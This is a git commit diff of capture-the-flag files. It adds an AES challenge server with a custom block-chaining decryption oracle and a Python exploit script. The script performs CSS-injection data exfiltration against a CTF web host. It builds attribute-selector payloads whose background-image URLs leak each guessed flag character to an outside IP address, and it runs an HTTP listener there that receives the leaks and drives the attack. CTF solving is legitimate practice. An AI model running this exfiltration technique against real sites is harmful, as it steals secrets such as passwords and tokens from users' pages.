ctf commits

This commit is contained in:
2024-04-26 18:47:45 +02:00
parent 6b23926e07
commit c322061276
9 changed files with 133 additions and 1 deletions

BIN
.DS_Store vendored

Binary file not shown.

2
.gitignore vendored Normal file
View File

@@ -0,0 +1,2 @@
htb/cyber_apocalypse_2024/pwn/pwn_sound_of_silence/challenge/

BIN
catthegrey24/.DS_Store vendored Normal file

Binary file not shown.

View File

@@ -0,0 +1 @@
.venv/

View File

@@ -0,0 +1,77 @@
from Crypto.Cipher import AES
import os
with open("flag.txt", "r") as f:
flag = f.read()
BLOCK_SIZE = 16
iv = os.urandom(BLOCK_SIZE)
xor = lambda x, y: bytes(a^b for a,b in zip(x,y))
key = os.urandom(16)
def encrypt(pt):
cipher = AES.new(key=key, mode=AES.MODE_ECB)
blocks = [pt[i:i+BLOCK_SIZE] for i in range(0, len(pt), BLOCK_SIZE)]
tmp = iv
ret = b""
for block in blocks:
res = cipher.encrypt(xor(block, tmp))
ret += res
tmp = xor(block, res)
return ret
def decrypt(ct):
cipher = AES.new(key=key, mode=AES.MODE_ECB)
blocks = [ct[i:i+BLOCK_SIZE] for i in range(0, len(ct), BLOCK_SIZE)]
for block in blocks:
if block in secret_enc:
blocks.remove(block)
tmp = iv
ret = b""
for block in blocks:
res = xor(cipher.decrypt(block), tmp)
ret += res
tmp = xor(block, res)
return ret
secret = os.urandom(80)
secret_enc = encrypt(secret)
print(f"Encrypted secret: {secret_enc.hex()}")
print("Enter messages to decrypt (in hex): ")
while True:
res = input("> ")
try:
enc = bytes.fromhex(res)
if (enc == secret_enc):
print("Nice try.")
continue
dec = decrypt(enc)
if (dec == secret):
print(f"Wow! Here's the flag: {flag}")
break
else:
print(dec.hex())
except Exception as e:
print(e)
continue

BIN
catthegrey24/web/.DS_Store vendored Normal file

Binary file not shown.

View File

@@ -0,0 +1 @@
.venv/*

View File

@@ -0,0 +1,51 @@
import string
import requests
import re
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import unquote
chars = string.ascii_uppercase + string.digits + "f"
url = "http://challs2.nusgreyhats.org:33339"
headers = {"Content-Type": "application/x-www-form-urlencoded"}
class LeakHandler(BaseHTTPRequestHandler):
def do_GET(self):
print("Got GET request")
leaked_password = unquote(self.path.split("/")[-1])
print(f"Password: {leaked_password}")
self.send_response(200)
self.end_headers()
self.wfile.write(b"exploiting in progress")
print("Next round")
leak_char(leaked_password)
def generate_css_input(leaked_password):
css_input = ""
for a in chars:
css_input += f'input[id="flag"][value^="{leaked_password + a}"]{{background-image: url(http://49.12.225.44:8000/{leaked_password + a});}}'
return css_input
def leak_char(leaked_password):
css_input = generate_css_input(leaked_password)
print("Leaking character")
with requests.post(
f"{url}/submit", data={"css_value": css_input}, headers=headers
) as r:
match = re.search(r"/judge/([a-zA-Z0-9-]+)", r.text)
if match:
id_value = match.group(1)
print("Found ID:", id_value)
r = requests.post(f"http://challs2.nusgreyhats.org:33339/judge/{id_value}")
print(r.text)
else:
print("error")
httpd = HTTPServer(("0.0.0.0", 8000), LeakHandler)
httpd.serve_forever()

View File

@@ -1,3 +1,3 @@
#!/bin/sh
docker build --tag=sound_of_silence .
docker run -it -p 1337:1337 --rm --name=sound_of_silence sound_of_silence
docker run -it -p 1337:1337 --rm --name=sound_of_silence sound_of_silence